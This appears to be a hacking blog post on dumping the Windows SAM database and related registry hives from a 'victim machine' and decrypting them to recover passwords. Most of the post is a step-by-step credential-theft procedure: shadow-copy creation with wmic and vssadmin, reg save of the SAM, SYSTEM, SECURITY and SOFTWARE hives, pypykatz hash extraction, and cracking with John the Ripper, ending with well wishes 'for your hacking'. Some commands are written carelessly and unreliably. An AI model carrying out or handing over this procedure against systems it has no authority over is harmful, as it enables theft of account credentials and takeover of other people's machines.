In this post we'll dive into the methods to dump SAM Database, decrypt it and attempt to obtain Windows Credentials. Whether you are a casual Windows user or an IT professional, gaining a better understanding of the SAM database can provide valuable insights into Windows inner workings.
What Is SAM Database?
SAM database (Security Accounts Manager database) is a crucial part of the Windows operating system. It is a registry file that stores user account information, including usernames, passwords, and user groups. The primary purpose of the SAM database is to authenticate local users when they sign in to their Windows devices.
The SAM database is located in the %SystemRoot%\system32\config folder and is usually named SAM. Due to its importance, the file is encrypted and cannot be accessed or modified directly when the operating system is running. However, administrators can interact with the SAM database using built-in tools, such as the Local Users and Groups Manager or the net command in the command prompt.
It's important to note that the SAM database is relevant for local accounts, not for domain accounts in the Active Directory environment.
Obtaining Key Files
In this post we will dump some core files that we need, to attempt to decrypt the SAM Database.
First we need to determine Local Computer Name from the associated environment variable:
$env:computername
result: DESKTOP-PQIB8HT
now we use the result with the WMI Win32_UserAccount class
[wmi] "Win32_UserAccount.Domain='DESKTOP-PQIB8HT',Name='Administrator'"
This will tell us what type of rid we have in our computer.
Workarounds to dump the SAM database:
With an cmd run as administrator go to
cd C:\Windows\System32\config\SAM
There are multiple methods to obtain the SAM database, here I will show you 3 of them.
- Use the Volume Shadow Copy Server to create a snapshot or "shadow volume" of the local hard drive with vssadmin
This option is only available in servers edition
- Execute previous option using WMIC launched from an administrator command prompt
wmic shadowcopy call create Volume='C:\'
This will create a snapshot of the C: Drive
To verify the completion of the previous step we can run vssadmin and list the existing shadow volumes
vssadmin list shadows
Now that we can see the Shadow Copy Volume, we can copy the SAM database from it by using the source path.
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
copy Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Users\
We have copied it locally. Please note that this copy it's partially encrypted with RC4 or AES. The encryption keys are stored in the SYSTEM file which is in the same folder as the SAM database and it's locked by the SYSTEM account.
So we use our shadow copy to copy this file too.
- We can get a copy of the SAM database and SYSTEM files from the registry in
- HKLM\sam
- HKLM\system
This one is by far my favorite and the method I recommend.
reg save HKLM\sam C:\Users\sam
reg save HKLM\system C:\Users\system
Decryption
Let's move to the fun part. We will proceed to decrypt the SAM database. Before, it used to be two ways to do it: either with Mimikatz or with Creddump7.
None of those have worked for me so we will use a third option.
For this we need to move the files we dumped from Windows victim machine to our Kali machine. I moved them using google drive but you can use also the method to copy through network path.
Prepare the environment and upgrade your pip version
python3.10 -m pip install --upgrade pip
pip install crypto
The third option I mentioned is to decrypt the SAM Database using Pypykatz
Since Pypykatz will also need the SOFTWARE and SECURITY hives from the registry we go back to our Victim machine and dump those files too. (Now that you know you will get all the files at once 😊)
reg save HKLM\software C:\Users\software
reg save HKLM\security C:\Users\security
And finally we are ready to run Pypykatz to decrypt our SAM Database.
pypykatz registry --sam /home/info/Downloads/sam --security /home/info/Downloads/security --software /home/info/Downloads/software -o hashes.txt /home/info/Downloads/system
As you can see, we have successfully decrypted the SAM database and obtained the NTLM password hash for the local administrator account ... and other good stuff as well.
From here you have multiple options to get the hash value, I like using john the ripper for example.
Copy the Administrator hash into a txt. file
Here you have it, our password is : Administrator.
I hope you enjoyed this post and you find it useful for your hacking. See you in the next post! ♥
No comments:
Post a Comment